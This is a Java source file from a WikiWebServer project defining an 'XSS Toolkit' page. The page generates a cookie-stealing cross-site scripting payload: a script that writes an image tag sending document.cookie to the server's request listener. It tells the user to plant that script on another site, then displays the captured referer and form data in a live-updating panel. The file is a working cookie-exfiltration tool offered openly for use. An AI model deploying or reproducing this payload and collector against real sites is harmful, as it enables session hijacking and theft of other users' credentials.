package page.example;

import java.util.Map;

import org.wikiwebserver.core.WareHouse;
import org.wikiwebserver.core.WikiMap;
import org.wikiwebserver.handler.http.HTTPException;
import org.wikiwebserver.handler.http.interfaces.HTTPResponder;
import org.wikiwebserver.html.HTMLHelper.ContainerType;

import page.config.SiteTemplatedPage;

import static org.wikiwebserver.html.HTMLHelper.*;

public class XSSToolkit extends SiteTemplatedPage implements HTTPResponder {
	
    public void generate() throws HTTPException {
        
        setTitle("XSS Toolkit - WikiWebServer.org");
        addResourceRoot("/templates/default/viewer/");
        addCSSLink("viewer.css"); 
        
        String referer = (String) getData().get("Referer");
        
        String cookieXferScript = javaScript(
               "document.writeln('<img src=\"" + getServiceAddress() +
               WareHouse.getUrlPathForClass(page.image.RequestListener.class) +
               "?Cookie=' + escape(document.cookie) + '\"');");
        
        append(h(1, "Cross Site Scripting Toolkit") +
               p("This class monitors requests to " +
                 WareHouse.getUrlPathForClass(page.image.RequestListener.class) + "." +
                 " Information can be sent with the request by adding query" +
                 " data. ") +
               h(2, "Cookie stealing") +
               p("By adding the following script to a web page on another site" +
               	 " the site cookie will be sent to WikiWebServer.") +
               textarea("script", cookieXferScript, "rows='6' style='width: 100%'") +
               h(2, "Recieved data") +
               p("Referer " + referer) +
               div("formData", formatMap((WikiMap)getData().get("FormData")))
               
              );
          
        setPeriodicAjaxUpdateEnabled(true);
    }
    
    public void ajax() {
        append(updateHTMLScript("formData", formatMap((WikiMap)getData().get("FormData"))));
    }

    private String formatMap(Map<String, Object> data) {
        if (data == null) return p("No data");
        
        StringBuilder bill = new StringBuilder();
        for (Map.Entry<String, Object> entry : data.entrySet()) {
            String key = WareHouse.escapeHTMLEntities(entry.getKey());
            String value = WareHouse.escapeHTMLEntities(entry.getValue().toString());
            bill.append(div(ContainerType.CLASS, "entry", 
                            div(ContainerType.CLASS, "key", key) +
                            div(ContainerType.CLASS, "value", value)
                            ) +
                        cleardiv()
                        );
        }
        return bill.toString();
    }
    
    public WikiMap getData() {
        WikiMap map = WareHouse.getWikiMap("ImageRequestMonitor");
        if (map == null) map = WareHouse.initWikiMap("ImageRequestMonitor");
        return map;        
    }       
    
    @Override
    public String getCacheKey() {
        return String.valueOf(getData().getLastModifiedTime());
    }
}